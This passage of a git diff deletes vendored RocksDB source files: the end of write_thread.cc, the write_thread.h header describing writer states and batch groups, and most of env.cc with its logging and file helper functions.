-  if (!allow_concurrent_memtable_write_ || !leader->batch->HasMerge()) {
-    Writer* newest_writer = newest_memtable_writer_.load();
-    CreateMissingNewerLinks(newest_writer);
-
-    Writer* w = leader;
-    while (w != newest_writer) {
-      w = w->link_newer;
-
-      if (w->batch == nullptr) {
-        break;
-      }
-
-      if (w->batch->HasMerge()) {
-        break;
-      }
-
-      if (!allow_concurrent_memtable_write_) {
-        auto batch_size = WriteBatchInternal::ByteSize(w->batch);
-        if (size + batch_size > max_size) {
-          // Do not make batch too big
-          break;
-        }
-        size += batch_size;
-      }
-
-      w->write_group = write_group;
-      last_writer = w;
-      write_group->size++;
-    }
-  }
-
-  write_group->last_writer = last_writer;
-  write_group->last_sequence =
-      last_writer->sequence + WriteBatchInternal::Count(last_writer->batch) - 1;
-}
-
-void WriteThread::ExitAsMemTableWriter(Writer* self, WriteGroup& write_group) {
-  Writer* leader = write_group.leader;
-  Writer* last_writer = write_group.last_writer;
-
-  Writer* newest_writer = last_writer;
-  if (!newest_memtable_writer_.compare_exchange_strong(newest_writer,
-                                                       nullptr)) {
-    CreateMissingNewerLinks(newest_writer);
-    Writer* next_leader = last_writer->link_newer;
-    assert(next_leader != nullptr);
-    next_leader->link_older = nullptr;
-    SetState(next_leader, STATE_MEMTABLE_WRITER_LEADER);
-  }
-  Writer* w = leader;
-  while (true) {
-    if (!write_group.status.ok()) {
-      w->status = write_group.status;
-    }
-    Writer* next = w->link_newer;
-    if (w != leader) {
-      SetState(w, STATE_COMPLETED);
-    }
-    if (w == last_writer) {
-      break;
-    }
-    w = next;
-  }
-  // Note that leader has to exit last, since it owns the write group.
-  SetState(leader, STATE_COMPLETED);
-}
-
-void WriteThread::LaunchParallelMemTableWriters(WriteGroup* write_group) {
-  assert(write_group != nullptr);
-  write_group->running.store(write_group->size);
-  for (auto w : *write_group) {
-    SetState(w, STATE_PARALLEL_MEMTABLE_WRITER);
-  }
-}
-
-static WriteThread::AdaptationContext cpmtw_ctx("CompleteParallelMemTableWriter");
-// This method is called by both the leader and parallel followers
-bool WriteThread::CompleteParallelMemTableWriter(Writer* w) {
-
-  auto* write_group = w->write_group;
-  if (!w->status.ok()) {
-    std::lock_guard<std::mutex> guard(write_group->leader->StateMutex());
-    write_group->status = w->status;
-  }
-
-  if (write_group->running-- > 1) {
-    // we're not the last one
-    AwaitState(w, STATE_COMPLETED, &cpmtw_ctx);
-    return false;
-  }
-  // else we're the last parallel worker and should perform exit duties.
-  w->status = write_group->status;
-  return true;
-}
-
-void WriteThread::ExitAsBatchGroupFollower(Writer* w) {
-  auto* write_group = w->write_group;
-
-  assert(w->state == STATE_PARALLEL_MEMTABLE_WRITER);
-  assert(write_group->status.ok());
-  ExitAsBatchGroupLeader(*write_group, write_group->status);
-  assert(w->status.ok());
-  assert(w->state == STATE_COMPLETED);
-  SetState(write_group->leader, STATE_COMPLETED);
-}
-
-static WriteThread::AdaptationContext eabgl_ctx("ExitAsBatchGroupLeader");
-void WriteThread::ExitAsBatchGroupLeader(WriteGroup& write_group,
-                                         Status status) {
-  Writer* leader = write_group.leader;
-  Writer* last_writer = write_group.last_writer;
-  assert(leader->link_older == nullptr);
-
-  if (enable_pipelined_write_) {
-    // Notify writers don't write to memtable to exit.
-    for (Writer* w = last_writer; w != leader;) {
-      Writer* next = w->link_older;
-      w->status = status;
-      if (!w->ShouldWriteToMemtable()) {
-        CompleteFollower(w, write_group);
-      }
-      w = next;
-    }
-    if (!leader->ShouldWriteToMemtable()) {
-      CompleteLeader(write_group);
-    }
-    // Link the ramaining of the group to memtable writer list.
-    if (write_group.size > 0) {
-      if (LinkGroup(write_group, &newest_memtable_writer_)) {
-        // The leader can now be different from current writer.
-        SetState(write_group.leader, STATE_MEMTABLE_WRITER_LEADER);
-      }
-    }
-    // Reset newest_writer_ and wake up the next leader.
-    Writer* newest_writer = last_writer;
-    if (!newest_writer_.compare_exchange_strong(newest_writer, nullptr)) {
-      Writer* next_leader = newest_writer;
-      while (next_leader->link_older != last_writer) {
-        next_leader = next_leader->link_older;
-        assert(next_leader != nullptr);
-      }
-      next_leader->link_older = nullptr;
-      SetState(next_leader, STATE_GROUP_LEADER);
-    }
-    AwaitState(leader, STATE_MEMTABLE_WRITER_LEADER |
-                           STATE_PARALLEL_MEMTABLE_WRITER | STATE_COMPLETED,
-               &eabgl_ctx);
-  } else {
-    Writer* head = newest_writer_.load(std::memory_order_acquire);
-    if (head != last_writer ||
-        !newest_writer_.compare_exchange_strong(head, nullptr)) {
-      // Either w wasn't the head during the load(), or it was the head
-      // during the load() but somebody else pushed onto the list before
-      // we did the compare_exchange_strong (causing it to fail).  In the
-      // latter case compare_exchange_strong has the effect of re-reading
-      // its first param (head).  No need to retry a failing CAS, because
-      // only a departing leader (which we are at the moment) can remove
-      // nodes from the list.
-      assert(head != last_writer);
-
-      // After walking link_older starting from head (if not already done)
-      // we will be able to traverse w->link_newer below. This function
-      // can only be called from an active leader, only a leader can
-      // clear newest_writer_, we didn't, and only a clear newest_writer_
-      // could cause the next leader to start their work without a call
-      // to MarkJoined, so we can definitely conclude that no other leader
-      // work is going on here (with or without db mutex).
-      CreateMissingNewerLinks(head);
-      assert(last_writer->link_newer->link_older == last_writer);
-      last_writer->link_newer->link_older = nullptr;
-
-      // Next leader didn't self-identify, because newest_writer_ wasn't
-      // nullptr when they enqueued (we were definitely enqueued before them
-      // and are still in the list).  That means leader handoff occurs when
-      // we call MarkJoined
-      SetState(last_writer->link_newer, STATE_GROUP_LEADER);
-    }
-    // else nobody else was waiting, although there might already be a new
-    // leader now
-
-    while (last_writer != leader) {
-      last_writer->status = status;
-      // we need to read link_older before calling SetState, because as soon
-      // as it is marked committed the other thread's Await may return and
-      // deallocate the Writer.
-      auto next = last_writer->link_older;
-      SetState(last_writer, STATE_COMPLETED);
-
-      last_writer = next;
-    }
-  }
-}
-
-static WriteThread::AdaptationContext eu_ctx("EnterUnbatched");
-void WriteThread::EnterUnbatched(Writer* w, InstrumentedMutex* mu) {
-  assert(w != nullptr && w->batch == nullptr);
-  mu->Unlock();
-  bool linked_as_leader = LinkOne(w, &newest_writer_);
-  if (!linked_as_leader) {
-    TEST_SYNC_POINT("WriteThread::EnterUnbatched:Wait");
-    // Last leader will not pick us as a follower since our batch is nullptr
-    AwaitState(w, STATE_GROUP_LEADER, &eu_ctx);
-  }
-  if (enable_pipelined_write_) {
-    WaitForMemTableWriters();
-  }
-  mu->Lock();
-}
-
-void WriteThread::ExitUnbatched(Writer* w) {
-  assert(w != nullptr);
-  Writer* newest_writer = w;
-  if (!newest_writer_.compare_exchange_strong(newest_writer, nullptr)) {
-    CreateMissingNewerLinks(newest_writer);
-    Writer* next_leader = w->link_newer;
-    assert(next_leader != nullptr);
-    next_leader->link_older = nullptr;
-    SetState(next_leader, STATE_GROUP_LEADER);
-  }
-}
-
-static WriteThread::AdaptationContext wfmw_ctx("WaitForMemTableWriters");
-void WriteThread::WaitForMemTableWriters() {
-  assert(enable_pipelined_write_);
-  if (newest_memtable_writer_.load() == nullptr) {
-    return;
-  }
-  Writer w;
-  if (!LinkOne(&w, &newest_memtable_writer_)) {
-    AwaitState(&w, STATE_MEMTABLE_WRITER_LEADER, &wfmw_ctx);
-  }
-  newest_memtable_writer_.store(nullptr);
-}
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/db/write_thread.h b/thirdparty/rocksdb/db/write_thread.h
deleted file mode 100644
index 57ce71e..0000000
--- a/thirdparty/rocksdb/db/write_thread.h
+++ /dev/null
@@ -1,391 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#pragma once
-
-#include <assert.h>
-#include <stdint.h>
-#include <atomic>
-#include <chrono>
-#include <condition_variable>
-#include <mutex>
-#include <type_traits>
-#include <vector>
-
-#include "db/write_callback.h"
-#include "monitoring/instrumented_mutex.h"
-#include "rocksdb/options.h"
-#include "rocksdb/status.h"
-#include "rocksdb/types.h"
-#include "rocksdb/write_batch.h"
-#include "util/autovector.h"
-
-namespace rocksdb {
-
-class WriteThread {
- public:
-  enum State : uint8_t {
-    // The initial state of a writer.  This is a Writer that is
-    // waiting in JoinBatchGroup.  This state can be left when another
-    // thread informs the waiter that it has become a group leader
-    // (-> STATE_GROUP_LEADER), when a leader that has chosen to be
-    // non-parallel informs a follower that its writes have been committed
-    // (-> STATE_COMPLETED), or when a leader that has chosen to perform
-    // updates in parallel and needs this Writer to apply its batch (->
-    // STATE_PARALLEL_FOLLOWER).
-    STATE_INIT = 1,
-
-    // The state used to inform a waiting Writer that it has become the
-    // leader, and it should now build a write batch group.  Tricky:
-    // this state is not used if newest_writer_ is empty when a writer
-    // enqueues itself, because there is no need to wait (or even to
-    // create the mutex and condvar used to wait) in that case.  This is
-    // a terminal state unless the leader chooses to make this a parallel
-    // batch, in which case the last parallel worker to finish will move
-    // the leader to STATE_COMPLETED.
-    STATE_GROUP_LEADER = 2,
-
-    // The state used to inform a waiting writer that it has become the
-    // leader of memtable writer group. The leader will either write
-    // memtable for the whole group, or launch a parallel group write
-    // to memtable by calling LaunchParallelMemTableWrite.
-    STATE_MEMTABLE_WRITER_LEADER = 4,
-
-    // The state used to inform a waiting writer that it has become a
-    // parallel memtable writer. It can be the group leader who launch the
-    // parallel writer group, or one of the followers. The writer should then
-    // apply its batch to the memtable concurrently and call
-    // CompleteParallelMemTableWriter.
-    STATE_PARALLEL_MEMTABLE_WRITER = 8,
-
-    // A follower whose writes have been applied, or a parallel leader
-    // whose followers have all finished their work.  This is a terminal
-    // state.
-    STATE_COMPLETED = 16,
-
-    // A state indicating that the thread may be waiting using StateMutex()
-    // and StateCondVar()
-    STATE_LOCKED_WAITING = 32,
-  };
-
-  struct Writer;
-
-  struct WriteGroup {
-    Writer* leader = nullptr;
-    Writer* last_writer = nullptr;
-    SequenceNumber last_sequence;
-    // before running goes to zero, status needs leader->StateMutex()
-    Status status;
-    std::atomic<size_t> running;
-    size_t size = 0;
-
-    struct Iterator {
-      Writer* writer;
-      Writer* last_writer;
-
-      explicit Iterator(Writer* w, Writer* last)
-          : writer(w), last_writer(last) {}
-
-      Writer* operator*() const { return writer; }
-
-      Iterator& operator++() {
-        assert(writer != nullptr);
-        if (writer == last_writer) {
-          writer = nullptr;
-        } else {
-          writer = writer->link_newer;
-        }
-        return *this;
-      }
-
-      bool operator!=(const Iterator& other) const {
-        return writer != other.writer;
-      }
-    };
-
-    Iterator begin() const { return Iterator(leader, last_writer); }
-    Iterator end() const { return Iterator(nullptr, nullptr); }
-  };
-
-  // Information kept for every waiting writer.
-  struct Writer {
-    WriteBatch* batch;
-    bool sync;
-    bool no_slowdown;
-    bool disable_wal;
-    bool disable_memtable;
-    uint64_t log_used;  // log number that this batch was inserted into
-    uint64_t log_ref;   // log number that memtable insert should reference
-    WriteCallback* callback;
-    bool made_waitable;          // records lazy construction of mutex and cv
-    std::atomic<uint8_t> state;  // write under StateMutex() or pre-link
-    WriteGroup* write_group;
-    SequenceNumber sequence;  // the sequence number to use for the first key
-    Status status;            // status of memtable inserter
-    Status callback_status;   // status returned by callback->Callback()
-    std::aligned_storage<sizeof(std::mutex)>::type state_mutex_bytes;
-    std::aligned_storage<sizeof(std::condition_variable)>::type state_cv_bytes;
-    Writer* link_older;  // read/write only before linking, or as leader
-    Writer* link_newer;  // lazy, read/write only before linking, or as leader
-
-    Writer()
-        : batch(nullptr),
-          sync(false),
-          no_slowdown(false),
-          disable_wal(false),
-          disable_memtable(false),
-          log_used(0),
-          log_ref(0),
-          callback(nullptr),
-          made_waitable(false),
-          state(STATE_INIT),
-          write_group(nullptr),
-          link_older(nullptr),
-          link_newer(nullptr) {}
-
-    Writer(const WriteOptions& write_options, WriteBatch* _batch,
-           WriteCallback* _callback, uint64_t _log_ref, bool _disable_memtable)
-        : batch(_batch),
-          sync(write_options.sync),
-          no_slowdown(write_options.no_slowdown),
-          disable_wal(write_options.disableWAL),
-          disable_memtable(_disable_memtable),
-          log_used(0),
-          log_ref(_log_ref),
-          callback(_callback),
-          made_waitable(false),
-          state(STATE_INIT),
-          write_group(nullptr),
-          link_older(nullptr),
-          link_newer(nullptr) {}
-
-    ~Writer() {
-      if (made_waitable) {
-        StateMutex().~mutex();
-        StateCV().~condition_variable();
-      }
-    }
-
-    bool CheckCallback(DB* db) {
-      if (callback != nullptr) {
-        callback_status = callback->Callback(db);
-      }
-      return callback_status.ok();
-    }
-
-    void CreateMutex() {
-      if (!made_waitable) {
-        // Note that made_waitable is tracked separately from state
-        // transitions, because we can't atomically create the mutex and
-        // link into the list.
-        made_waitable = true;
-        new (&state_mutex_bytes) std::mutex;
-        new (&state_cv_bytes) std::condition_variable;
-      }
-    }
-
-    // returns the aggregate status of this Writer
-    Status FinalStatus() {
-      if (!status.ok()) {
-        // a non-ok memtable write status takes presidence
-        assert(callback == nullptr || callback_status.ok());
-        return status;
-      } else if (!callback_status.ok()) {
-        // if the callback failed then that is the status we want
-        // because a memtable insert should not have been attempted
-        assert(callback != nullptr);
-        assert(status.ok());
-        return callback_status;
-      } else {
-        // if there is no callback then we only care about
-        // the memtable insert status
-        assert(callback == nullptr || callback_status.ok());
-        return status;
-      }
-    }
-
-    bool CallbackFailed() {
-      return (callback != nullptr) && !callback_status.ok();
-    }
-
-    bool ShouldWriteToMemtable() {
-      return status.ok() && !CallbackFailed() && !disable_memtable;
-    }
-
-    bool ShouldWriteToWAL() {
-      return status.ok() && !CallbackFailed() && !disable_wal;
-    }
-
-    // No other mutexes may be acquired while holding StateMutex(), it is
-    // always last in the order
-    std::mutex& StateMutex() {
-      assert(made_waitable);
-      return *static_cast<std::mutex*>(static_cast<void*>(&state_mutex_bytes));
-    }
-
-    std::condition_variable& StateCV() {
-      assert(made_waitable);
-      return *static_cast<std::condition_variable*>(
-                 static_cast<void*>(&state_cv_bytes));
-    }
-  };
-
-  struct AdaptationContext {
-    const char* name;
-    std::atomic<int32_t> value;
-
-    explicit AdaptationContext(const char* name0) : name(name0), value(0) {}
-  };
-
-  explicit WriteThread(const ImmutableDBOptions& db_options);
-
-  virtual ~WriteThread() = default;
-
-  // IMPORTANT: None of the methods in this class rely on the db mutex
-  // for correctness. All of the methods except JoinBatchGroup and
-  // EnterUnbatched may be called either with or without the db mutex held.
-  // Correctness is maintained by ensuring that only a single thread is
-  // a leader at a time.
-
-  // Registers w as ready to become part of a batch group, waits until the
-  // caller should perform some work, and returns the current state of the
-  // writer.  If w has become the leader of a write batch group, returns
-  // STATE_GROUP_LEADER.  If w has been made part of a sequential batch
-  // group and the leader has performed the write, returns STATE_DONE.
-  // If w has been made part of a parallel batch group and is responsible
-  // for updating the memtable, returns STATE_PARALLEL_FOLLOWER.
-  //
-  // The db mutex SHOULD NOT be held when calling this function, because
-  // it will block.
-  //
-  // Writer* w:        Writer to be executed as part of a batch group
-  void JoinBatchGroup(Writer* w);
-
-  // Constructs a write batch group led by leader, which should be a
-  // Writer passed to JoinBatchGroup on the current thread.
-  //
-  // Writer* leader:          Writer that is STATE_GROUP_LEADER
-  // WriteGroup* write_group: Out-param of group members
-  // returns:                 Total batch group byte size
-  size_t EnterAsBatchGroupLeader(Writer* leader, WriteGroup* write_group);
-
-  // Unlinks the Writer-s in a batch group, wakes up the non-leaders,
-  // and wakes up the next leader (if any).
-  //
-  // WriteGroup* write_group: the write group
-  // Status status:           Status of write operation
-  void ExitAsBatchGroupLeader(WriteGroup& write_group, Status status);
-
-  // Exit batch group on behalf of batch group leader.
-  void ExitAsBatchGroupFollower(Writer* w);
-
-  // Constructs a write batch group led by leader from newest_memtable_writers_
-  // list. The leader should either write memtable for the whole group and
-  // call ExitAsMemTableWriter, or launch parallel memtable write through
-  // LaunchParallelMemTableWriters.
-  void EnterAsMemTableWriter(Writer* leader, WriteGroup* write_grup);
-
-  // Memtable writer group leader, or the last finished writer in a parallel
-  // write group, exit from the newest_memtable_writers_ list, and wake up
-  // the next leader if needed.
-  void ExitAsMemTableWriter(Writer* self, WriteGroup& write_group);
-
-  // Causes JoinBatchGroup to return STATE_PARALLEL_FOLLOWER for all of the
-  // non-leader members of this write batch group.  Sets Writer::sequence
-  // before waking them up.
-  //
-  // WriteGroup* write_group: Extra state used to coordinate the parallel add
-  void LaunchParallelMemTableWriters(WriteGroup* write_group);
-
-  // Reports the completion of w's batch to the parallel group leader, and
-  // waits for the rest of the parallel batch to complete.  Returns true
-  // if this thread is the last to complete, and hence should advance
-  // the sequence number and then call EarlyExitParallelGroup, false if
-  // someone else has already taken responsibility for that.
-  bool CompleteParallelMemTableWriter(Writer* w);
-
-  // Waits for all preceding writers (unlocking mu while waiting), then
-  // registers w as the currently proceeding writer.
-  //
-  // Writer* w:              A Writer not eligible for batching
-  // InstrumentedMutex* mu:  The db mutex, to unlock while waiting
-  // REQUIRES: db mutex held
-  void EnterUnbatched(Writer* w, InstrumentedMutex* mu);
-
-  // Completes a Writer begun with EnterUnbatched, unblocking subsequent
-  // writers.
-  void ExitUnbatched(Writer* w);
-
-  // Wait for all parallel memtable writers to finish, in case pipelined
-  // write is enabled.
-  void WaitForMemTableWriters();
-
-  SequenceNumber UpdateLastSequence(SequenceNumber sequence) {
-    if (sequence > last_sequence_) {
-      last_sequence_ = sequence;
-    }
-    return last_sequence_;
-  }
-
- private:
-  // See AwaitState.
-  const uint64_t max_yield_usec_;
-  const uint64_t slow_yield_usec_;
-
-  // Allow multiple writers write to memtable concurrently.
-  const bool allow_concurrent_memtable_write_;
-
-  // Enable pipelined write to WAL and memtable.
-  const bool enable_pipelined_write_;
-
-  // Points to the newest pending writer. Only leader can remove
-  // elements, adding can be done lock-free by anybody.
-  std::atomic<Writer*> newest_writer_;
-
-  // Points to the newest pending memtable writer. Used only when pipelined
-  // write is enabled.
-  std::atomic<Writer*> newest_memtable_writer_;
-
-  // The last sequence that have been consumed by a writer. The sequence
-  // is not necessary visible to reads because the writer can be ongoing.
-  SequenceNumber last_sequence_;
-
-  // Waits for w->state & goal_mask using w->StateMutex().  Returns
-  // the state that satisfies goal_mask.
-  uint8_t BlockingAwaitState(Writer* w, uint8_t goal_mask);
-
-  // Blocks until w->state & goal_mask, returning the state value
-  // that satisfied the predicate.  Uses ctx to adaptively use
-  // std::this_thread::yield() to avoid mutex overheads.  ctx should be
-  // a context-dependent static.
-  uint8_t AwaitState(Writer* w, uint8_t goal_mask, AdaptationContext* ctx);
-
-  // Set writer state and wake the writer up if it is waiting.
-  void SetState(Writer* w, uint8_t new_state);
-
-  // Links w into the newest_writer list. Return true if w was linked directly
-  // into the leader position.  Safe to call from multiple threads without
-  // external locking.
-  bool LinkOne(Writer* w, std::atomic<Writer*>* newest_writer);
-
-  // Link write group into the newest_writer list as a whole, while keeping the
-  // order of the writers unchanged. Return true if the group was linked
-  // directly into the leader position.
-  bool LinkGroup(WriteGroup& write_group, std::atomic<Writer*>* newest_writer);
-
-  // Computes any missing link_newer links.  Should not be called
-  // concurrently with itself.
-  void CreateMissingNewerLinks(Writer* head);
-
-  // Set the leader in write_group to completed state and remove it from the
-  // write group.
-  void CompleteLeader(WriteGroup& write_group);
-
-  // Set a follower in write_group to completed state and remove it from the
-  // write group.
-  void CompleteFollower(Writer* w, WriteGroup& write_group);
-};
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/env/env.cc b/thirdparty/rocksdb/env/env.cc
deleted file mode 100644
index ae0b111..0000000
--- a/thirdparty/rocksdb/env/env.cc
+++ /dev/null
@@ -1,381 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#include "rocksdb/env.h"
-
-#include <thread>
-#include "options/db_options.h"
-#include "port/port.h"
-#include "port/sys_time.h"
-#include "rocksdb/options.h"
-#include "util/arena.h"
-#include "util/autovector.h"
-
-namespace rocksdb {
-
-Env::~Env() {
-}
-
-uint64_t Env::GetThreadID() const {
-  std::hash<std::thread::id> hasher;
-  return hasher(std::this_thread::get_id());
-}
-
-Status Env::ReuseWritableFile(const std::string& fname,
-                              const std::string& old_fname,
-                              unique_ptr<WritableFile>* result,
-                              const EnvOptions& options) {
-  Status s = RenameFile(old_fname, fname);
-  if (!s.ok()) {
-    return s;
-  }
-  return NewWritableFile(fname, result, options);
-}
-
-Status Env::GetChildrenFileAttributes(const std::string& dir,
-                                      std::vector<FileAttributes>* result) {
-  assert(result != nullptr);
-  std::vector<std::string> child_fnames;
-  Status s = GetChildren(dir, &child_fnames);
-  if (!s.ok()) {
-    return s;
-  }
-  result->resize(child_fnames.size());
-  size_t result_size = 0;
-  for (size_t i = 0; i < child_fnames.size(); ++i) {
-    const std::string path = dir + "/" + child_fnames[i];
-    if (!(s = GetFileSize(path, &(*result)[result_size].size_bytes)).ok()) {
-      if (FileExists(path).IsNotFound()) {
-        // The file may have been deleted since we listed the directory
-        continue;
-      }
-      return s;
-    }
-    (*result)[result_size].name = std::move(child_fnames[i]);
-    result_size++;
-  }
-  result->resize(result_size);
-  return Status::OK();
-}
-
-SequentialFile::~SequentialFile() {
-}
-
-RandomAccessFile::~RandomAccessFile() {
-}
-
-WritableFile::~WritableFile() {
-}
-
-Logger::~Logger() {
-}
-
-FileLock::~FileLock() {
-}
-
-void LogFlush(Logger *info_log) {
-  if (info_log) {
-    info_log->Flush();
-  }
-}
-
-void Log(Logger* info_log, const char* format, ...) {
-  if (info_log && info_log->GetInfoLogLevel() <= InfoLogLevel::INFO_LEVEL) {
-    va_list ap;
-    va_start(ap, format);
-    info_log->Logv(InfoLogLevel::INFO_LEVEL, format, ap);
-    va_end(ap);
-  }
-}
-
-void Logger::Logv(const InfoLogLevel log_level, const char* format, va_list ap) {
-  static const char* kInfoLogLevelNames[5] = { "DEBUG", "INFO", "WARN",
-    "ERROR", "FATAL" };
-  if (log_level < log_level_) {
-    return;
-  }
-
-  if (log_level == InfoLogLevel::INFO_LEVEL) {
-    // Doesn't print log level if it is INFO level.
-    // This is to avoid unexpected performance regression after we add
-    // the feature of log level. All the logs before we add the feature
-    // are INFO level. We don't want to add extra costs to those existing
-    // logging.
-    Logv(format, ap);
-  } else {
-    char new_format[500];
-    snprintf(new_format, sizeof(new_format) - 1, "[%s] %s",
-      kInfoLogLevelNames[log_level], format);
-    Logv(new_format, ap);
-  }
-}
-
-
-void Log(const InfoLogLevel log_level, Logger* info_log, const char* format,
-         ...) {
-  if (info_log && info_log->GetInfoLogLevel() <= log_level) {
-    va_list ap;
-    va_start(ap, format);
-
-    if (log_level == InfoLogLevel::HEADER_LEVEL) {
-      info_log->LogHeader(format, ap);
-    } else {
-      info_log->Logv(log_level, format, ap);
-    }
-
-    va_end(ap);
-  }
-}
-
-void Header(Logger* info_log, const char* format, ...) {
-  if (info_log) {
-    va_list ap;
-    va_start(ap, format);
-    info_log->LogHeader(format, ap);
-    va_end(ap);
-  }
-}
-
-void Debug(Logger* info_log, const char* format, ...) {
-  if (info_log && info_log->GetInfoLogLevel() <= InfoLogLevel::DEBUG_LEVEL) {
-    va_list ap;
-    va_start(ap, format);
-    info_log->Logv(InfoLogLevel::DEBUG_LEVEL, format, ap);
-    va_end(ap);
-  }
-}
-
-void Info(Logger* info_log, const char* format, ...) {
-  if (info_log && info_log->GetInfoLogLevel() <= InfoLogLevel::INFO_LEVEL) {
-    va_list ap;
-    va_start(ap, format);
-    info_log->Logv(InfoLogLevel::INFO_LEVEL, format, ap);
-    va_end(ap);
-  }
-}
-
-void Warn(Logger* info_log, const char* format, ...) {
-  if (info_log && info_log->GetInfoLogLevel() <= InfoLogLevel::WARN_LEVEL) {
-    va_list ap;
-    va_start(ap, format);
-    info_log->Logv(InfoLogLevel::WARN_LEVEL, format, ap);
-    va_end(ap);
-  }
-}
-void Error(Logger* info_log, const char* format, ...) {
-  if (info_log && info_log->GetInfoLogLevel() <= InfoLogLevel::ERROR_LEVEL) {
-    va_list ap;
-    va_start(ap, format);
-    info_log->Logv(InfoLogLevel::ERROR_LEVEL, format, ap);
-    va_end(ap);
-  }
-}
-void Fatal(Logger* info_log, const char* format, ...) {
-  if (info_log && info_log->GetInfoLogLevel() <= InfoLogLevel::FATAL_LEVEL) {
-    va_list ap;
-    va_start(ap, format);
-    info_log->Logv(InfoLogLevel::FATAL_LEVEL, format, ap);
-    va_end(ap);
-  }
-}
-
-void LogFlush(const shared_ptr<Logger>& info_log) {
-  if (info_log) {
-    info_log->Flush();
-  }
-}
-
-void Log(const InfoLogLevel log_level, const shared_ptr<Logger>& info_log,
-         const char* format, ...) {
-  if (info_log) {
-    va_list ap;
-    va_start(ap, format);
-    info_log->Logv(log_level, format, ap);
-    va_end(ap);
-  }
-}
-
-void Header(const shared_ptr<Logger>& info_log, const char* format, ...) {
-  if (info_log) {
-    va_list ap;
-    va_start(ap, format);
-    info_log->LogHeader(format, ap);
-    va_end(ap);
-  }
-}
-
-void Debug(const shared_ptr<Logger>& info_log, const char* format, ...) {
-  if (info_log) {
-    va_list ap;
-    va_start(ap, format);
-    info_log->Logv(InfoLogLevel::DEBUG_LEVEL, format, ap);
-    va_end(ap);
-  }
-}
-
-void Info(const shared_ptr<Logger>& info_log, const char* format, ...) {
-  if (info_log) {
-    va_list ap;
-    va_start(ap, format);
-    info_log->Logv(InfoLogLevel::INFO_LEVEL, format, ap);
-    va_end(ap);
-  }
-}
-
-void Warn(const shared_ptr<Logger>& info_log, const char* format, ...) {
-  if (info_log) {
-    va_list ap;
-    va_start(ap, format);
-    info_log->Logv(InfoLogLevel::WARN_LEVEL, format, ap);
-    va_end(ap);
-  }
-}
-
-void Error(const shared_ptr<Logger>& info_log, const char* format, ...) {
-  if (info_log) {
-    va_list ap;
-    va_start(ap, format);
-    info_log->Logv(InfoLogLevel::ERROR_LEVEL, format, ap);
-    va_end(ap);
-  }
-}
-
-void Fatal(const shared_ptr<Logger>& info_log, const char* format, ...) {
-  if (info_log) {
-    va_list ap;
-    va_start(ap, format);
-    info_log->Logv(InfoLogLevel::FATAL_LEVEL, format, ap);
-    va_end(ap);
-  }
-}
-
-void Log(const shared_ptr<Logger>& info_log, const char* format, ...) {
-  if (info_log) {
-    va_list ap;
-    va_start(ap, format);
-    info_log->Logv(InfoLogLevel::INFO_LEVEL, format, ap);
-    va_end(ap);
-  }
-}
-
-Status WriteStringToFile(Env* env, const Slice& data, const std::string& fname,
-                         bool should_sync) {
-  unique_ptr<WritableFile> file;
-  EnvOptions soptions;
-  Status s = env->NewWritableFile(fname, &file, soptions);
-  if (!s.ok()) {
-    return s;
-  }
-  s = file->Append(data);
-  if (s.ok() && should_sync) {
-    s = file->Sync();
-  }
-  if (!s.ok()) {
-    env->DeleteFile(fname);
-  }
-  return s;
-}
-
-Status ReadFileToString(Env* env, const std::string& fname, std::string* data) {
-  EnvOptions soptions;
-  data->clear();
-  unique_ptr<SequentialFile> file;
-  Status s = env->NewSequentialFile(fname, &file, soptions);
-  if (!s.ok()) {
-    return s;
-  }
-  static const int kBufferSize = 8192;
-  char* space = new char[kBufferSize];
-  while (true) {
-    Slice fragment;
-    s = file->Read(kBufferSize, &fragment, space);
-    if (!s.ok()) {
-      break;
-    }
-    data->append(fragment.data(), fragment.size());
-    if (fragment.empty()) {
-      break;
-    }
-  }
-  delete[] space;
-  return s;
-}
-
-EnvWrapper::~EnvWrapper() {
-}
-
-namespace {  // anonymous namespace
-
-void AssignEnvOptions(EnvOptions* env_options, const DBOptions& options) {
-  env_options->use_mmap_reads = options.allow_mmap_reads;
-  env_options->use_mmap_writes = options.allow_mmap_writes;
-  env_options->use_direct_reads = options.use_direct_reads;
-  env_options->set_fd_cloexec = options.is_fd_close_on_exec;
-  env_options->bytes_per_sync = options.bytes_per_sync;
-  env_options->compaction_readahead_size = options.compaction_readahead_size;
-  env_options->random_access_max_buffer_size =
-      options.random_access_max_buffer_size;
-  env_options->rate_limiter = options.rate_limiter.get();
-  env_options->writable_file_max_buffer_size =
-      options.writable_file_max_buffer_size;
-  env_options->allow_fallocate = options.allow_fallocate;
-}
-
-}
-
-EnvOptions Env::OptimizeForLogWrite(const EnvOptions& env_options,
-                                    const DBOptions& db_options) const {
-  EnvOptions optimized_env_options(env_options);
-  optimized_env_options.bytes_per_sync = db_options.wal_bytes_per_sync;
-  return optimized_env_options;
-}
-
-EnvOptions Env::OptimizeForManifestWrite(const EnvOptions& env_options) const {
-  return env_options;
-}
-
-EnvOptions Env::OptimizeForLogRead(const EnvOptions& env_options) const {
-  EnvOptions optimized_env_options(env_options);
-  optimized_env_options.use_direct_reads = false;
-  return optimized_env_options;
-}
-
-EnvOptions Env::OptimizeForManifestRead(const EnvOptions& env_options) const {
-  EnvOptions optimized_env_options(env_options);
-  optimized_env_options.use_direct_reads = false;
-  return optimized_env_options;
-}
-
-EnvOptions Env::OptimizeForCompactionTableWrite(
-    const EnvOptions& env_options, const ImmutableDBOptions& db_options) const {
-  EnvOptions optimized_env_options(env_options);
-  optimized_env_options.use_direct_writes =
-      db_options.use_direct_io_for_flush_and_compaction;
-  return optimized_env_options;
-}
-
-EnvOptions Env::OptimizeForCompactionTableRead(
-    const EnvOptions& env_options, const ImmutableDBOptions& db_options) const {
-  EnvOptions optimized_env_options(env_options);
-  optimized_env_options.use_direct_reads =
-      db_options.use_direct_io_for_flush_and_compaction;
-  return optimized_env_options;
-}
-
